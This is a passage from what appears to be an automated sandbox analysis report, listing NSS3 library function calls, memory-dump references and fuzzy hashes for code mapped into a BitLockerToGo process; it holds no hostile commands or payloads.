                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CertCriticalItem_SectionUnlockUtilValue$EnterFindHashLeaveLookupTableZfree
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1376842649-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: df0879116e7497a849be08183c36c73c4b71182f51ecf21d6fc06b017cc5b925
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 2a72b87df1e5479f39bbf4b1cad3d65c433a1573f05bfca177f956272ef2e867
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: df0879116e7497a849be08183c36c73c4b71182f51ecf21d6fc06b017cc5b925
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F51102B6A00505ABEF012A25AC058AB3AB8EB0325DF19C130ED1C83711FB22D85886D9
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6611C0: PR_NewLock.NSS3 ref: 6C661216
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C649E17
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C649E25
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C649E4E
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C649EA2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C659500: memcpy.VCRUNTIME140(00000000,?,00000000,?,?), ref: 6C659546
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C649EB6
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C649ED9
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C649F18
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: strlen$CriticalEnterErrorLockSectionUnlockValuefreememcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3381623595-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2fc7888b69b70a4d33049007a97c525a533f357559ccae050ae72bd8390a309b
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 93372f5ac3a902ad8e4c012eebac347fb7cd097c059cde3d580156ed3982699b
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fc7888b69b70a4d33049007a97c525a533f357559ccae050ae72bd8390a309b
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D81F7B1A40601ABEB109F34DD41AAB77E9FF4634CF14C528E84987B41FB31E925C79A
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C65AB10: DeleteCriticalSection.KERNEL32(D958E852,6C661397,5B5F5EC0,?,?,6C65B1EE,2404110F,?,?), ref: 6C65AB3C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C65AB10: free.MOZGLUE(D958E836,?,6C65B1EE,2404110F,?,?), ref: 6C65AB49
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C65AB10: DeleteCriticalSection.KERNEL32(5D5E6C85), ref: 6C65AB5C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C65AB10: free.MOZGLUE(5D5E6C79), ref: 6C65AB63
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C65AB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6C65AB6F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C65AB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6C65AB76
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C65DCFA
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000000), ref: 6C65DD0E
                                                                                                                                                                                                                                                                                                                                                          • PK11_IsFriendly.NSS3(?), ref: 6C65DD73
                                                                                                                                                                                                                                                                                                                                                          • PK11_IsLoggedIn.NSS3(?,00000000), ref: 6C65DD8B
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C65DE81
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C65DEA6
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C65DF08
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$Deletefree$K11_$EnterFriendlyLoggedUnlockValuememcpystrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 519503562-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 1c5741c64dd9bd57f66a8862318843ab1a67198f8a85416e8c328aaebcc11aab
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: abd5c2e0e5b4f581fb95608a67f2df791cab8228b074cc9992fbf217d0dc46d2
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c5741c64dd9bd57f66a8862318843ab1a67198f8a85416e8c328aaebcc11aab
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3691E6B5A001059FEB00CF68C980BAAB7B1FF45308FB44125DC199BB91E731E966CB99
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5C4FC4
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,0002996C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C5C51BB
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C5C51B4
                                                                                                                                                                                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C5C51A5
                                                                                                                                                                                                                                                                                                                                                          • unable to delete/modify user-function due to active statements, xrefs: 6C5C51DF
                                                                                                                                                                                                                                                                                                                                                          • misuse, xrefs: 6C5C51AF
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: sqlite3_logstrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify user-function due to active statements
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3619038524-4115156624
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ea4bcf741ad1178a37a0f3d1a0a8bf06de7d83f7eeb20f54f5d1d2bbc5b1302b
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c46146aa2261e4886891b3c973933ebd91d0c6ad5373b7e69876e822d3394e4f
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea4bcf741ad1178a37a0f3d1a0a8bf06de7d83f7eeb20f54f5d1d2bbc5b1302b
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F971AEB57042099BEB00CED5CD84B9A77B5BF48308F844528FD19DBB81D735E950DBA2
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE002,00000000,00000000,00000000,?,?,6C6B21DD,00000000), ref: 6C6B2A47
                                                                                                                                                                                                                                                                                                                                                          • SEC_ASN1EncodeInteger_Util.NSS3(?,6C6B21DD,00000002,00000000,00000000,?,?,6C6B21DD,00000000), ref: 6C6B2A60
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3(00000000,?,?,?,?,00000000,00000000,?,?,6C6B21DD,00000000), ref: 6C6B2A8E
                                                                                                                                                                                                                                                                                                                                                          • PK11_KeyGen.NSS3(00000000,?,00000000,83F089CA,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C6B2AE9
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(00000000), ref: 6C6B2B0D
                                                                                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(?), ref: 6C6B2B7B
                                                                                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(?), ref: 6C6B2BD6
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: K11_Util$Free$ArenaEncodeErrorFindInteger_Mark_Tag_
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1625981074-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 996cb26b5806719adab46b700d1b8e027266d66b884975fffaaafc4993e06ca8
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 894fa4cbc18b5adcd1de902242f6925121cca1ab51dcc337a0830dd75ff817f2
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 996cb26b5806719adab46b700d1b8e027266d66b884975fffaaafc4993e06ca8
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B65117B1E002069BEB108E65DC84FAA77F5AF4531CF150134ED19BB782EB31E925C799
APIs
• PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C68AB3E,?,?,?), ref: 6C68AC35
  • Part of subcall function 6C66CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C66CF16
• PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C68AB3E,?,?,?), ref: 6C68AC55
  • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A10F3
  • Part of subcall function 6C6A10C0: EnterCriticalSection.KERNEL32(?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A110C
  • Part of subcall function 6C6A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1141
  • Part of subcall function 6C6A10C0: PR_Unlock.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1182
  • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A119C
• PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C68AB3E,?,?), ref: 6C68AC70
  • Part of subcall function 6C66E300: TlsGetValue.KERNEL32 ref: 6C66E33C
  • Part of subcall function 6C66E300: EnterCriticalSection.KERNEL32(?), ref: 6C66E350
  • Part of subcall function 6C66E300: PR_Unlock.NSS3(?), ref: 6C66E5BC
  • Part of subcall function 6C66E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C66E5CA
  • Part of subcall function 6C66E300: TlsGetValue.KERNEL32 ref: 6C66E5F2
  • Part of subcall function 6C66E300: EnterCriticalSection.KERNEL32(?), ref: 6C66E606
  • Part of subcall function 6C66E300: PORT_Alloc_Util.NSS3(?), ref: 6C66E613
• PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C68AC92
• PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C68AB3E), ref: 6C68ACD7
• PORT_Alloc_Util.NSS3(?), ref: 6C68AD10
• memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C68AD2B
  • Part of subcall function 6C66F360: TlsGetValue.KERNEL32(00000000,?,6C68A904,?), ref: 6C66F38B
  • Part of subcall function 6C66F360: EnterCriticalSection.KERNEL32(?,?,?,6C68A904,?), ref: 6C66F3A0
  • Part of subcall function 6C66F360: PR_Unlock.NSS3(?,?,?,?,6C68A904,?), ref: 6C66F3D3
Memory Dump Source
• Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
Similarity
• API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
• String ID:
• API String ID: 2926855110-0
• Opcode ID: 1d894bb7578d1b5ba0c79bfdc17886169f8bd37402d0ddd5e64ed2109b92a7b4
• Instruction ID: 479552ac4f2610dae3a2526d335ed33122d6dee5ba9b9f4cd7a5667ff7e5e37b
• Opcode Fuzzy Hash: 1d894bb7578d1b5ba0c79bfdc17886169f8bd37402d0ddd5e64ed2109b92a7b4
• Instruction Fuzzy Hash: CE3127B1E016055FEB008F69CC409AF77B6AF85328B188128EC159BB81EB31DD15C7B9
APIs
• DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C64294E
  • Part of subcall function 6C6A1820: DER_GeneralizedTimeToTime_Util.NSS3(?,?,?,6C641D97,?,?), ref: 6C6A1836
• DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C64296A
• DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C642991
  • Part of subcall function 6C6A1820: PR_SetError.NSS3(FFFFE005,00000000,?,6C641D97,?,?), ref: 6C6A184D
• DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C6429AF
• PR_Now.NSS3 ref: 6C642A29
• PR_SetError.NSS3(FFFFE005,00000000), ref: 6C642A50
• PR_SetError.NSS3(FFFFE005,00000000), ref: 6C642A79
Memory Dump Source
• Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
Similarity
• API ID: TimeUtil$Choice_Decode$Error$GeneralizedTime_
• String ID:
• API String ID: 2509447271-0
• Opcode ID: 6009962952c32d91214843798800be9d889efca2f06f9ee4efe4544fb420ddea
• Instruction ID: d530eda24b6cd4b4719185a928cb5e82a9154033a2cd724021a061c5ea115772
• Opcode Fuzzy Hash: 6009962952c32d91214843798800be9d889efca2f06f9ee4efe4544fb420ddea
• Instruction Fuzzy Hash: 5D418171A093519FC714CE28C844A4FB7E5ABD9754F15CA2DFC98D3300E730E989879A
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_Now.NSS3 ref: 6C668C7C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C750A27), ref: 6C709DC6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C750A27), ref: 6C709DD1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C709DED
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C668CB0
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C668CD1
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C668CE5
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C668D2E
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C668D62
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C668D93
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3131193014-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8098f7b14007c5ff7a4cb0e10fac86091ec169abf76c8c3b715c50c32bbda97c
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b26df07342d19b810087c6bbedf6385a62e4eb65e778ab56917209330fff0c5e
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8098f7b14007c5ff7a4cb0e10fac86091ec169abf76c8c3b715c50c32bbda97c
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8312571A01205AFEB009F7ADC447DA77B0BF5A318F140136EA1967FA0D770A924C7DA
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6C6A9C5B), ref: 6C6A9D82
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: TlsGetValue.KERNEL32 ref: 6C6A14E0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: EnterCriticalSection.KERNEL32 ref: 6C6A14F5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: PR_Unlock.NSS3 ref: 6C6A150D
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6C6A9C5B), ref: 6C6A9DA9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C64895A,00000000,?,00000000,?,00000000,?,00000000,?,6C63F599,?,00000000), ref: 6C6A136A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A1340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C64895A,00000000,?,00000000,?,00000000,?,00000000,?,6C63F599,?,00000000), ref: 6C6A137E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A1340: PL_ArenaGrow.NSS3(?,6C63F599,?,00000000,?,6C64895A,00000000,?,00000000,?,00000000,?,00000000,?,6C63F599,?), ref: 6C6A13CF
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A1340: PR_Unlock.NSS3(?,?,6C64895A,00000000,?,00000000,?,00000000,?,00000000,?,6C63F599,?,00000000), ref: 6C6A145C
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6C6A9C5B), ref: 6C6A9DCE
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C64895A,00000000,?,00000000,?,00000000,?,00000000,?,6C63F599,?,00000000), ref: 6C6A13F0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A1340: PL_ArenaGrow.NSS3(?,6C63F599,?,?,?,00000000,00000000,?,6C64895A,00000000,?,00000000,?,00000000,?,00000000), ref: 6C6A1445
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000008,6C6A9C5B), ref: 6C6A9DDC
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6C6A9C5B), ref: 6C6A9DFE
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6C6A9C5B), ref: 6C6A9E43
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,6C6A9C5B), ref: 6C6A9E91
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6EC2BF
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A1560: TlsGetValue.KERNEL32(00000000,00000000,?,?,?,6C69FAAB,00000000), ref: 6C6A157E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A1560: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C69FAAB,00000000), ref: 6C6A1592
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A1560: memset.VCRUNTIME140(?,00000000,?), ref: 6C6A1600
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A1560: PL_ArenaRelease.NSS3(?,?), ref: 6C6A1620
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A1560: PR_Unlock.NSS3(?), ref: 6C6A1639
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Arena$Util$Value$Alloc_CriticalEnterSectionUnlock$GrowGrow_$ErrorMark_Releasememset
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3425318038-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e33632ba53bddd1a9c324ba4a4d2ef701814b8e47b6f6a337e312f5c19c0bc40
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B417CB4601606AFE7409F55D840B92BBA1FF4534CF248128D9188BFA1EB73E836CF94
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C66DDEC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6A08B4
                                                                                                                                                                                                                                                                                                                                                          • PK11_DigestBegin.NSS3(00000000), ref: 6C66DE70
                                                                                                                                                                                                                                                                                                                                                          • PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6C66DE83
                                                                                                                                                                                                                                                                                                                                                          • HASH_ResultLenByOidTag.NSS3(?), ref: 6C66DE95
                                                                                                                                                                                                                                                                                                                                                          • PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6C66DEAE
                                                                                                                                                                                                                                                                                                                                                          • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C66DEBB
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C66DECC
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
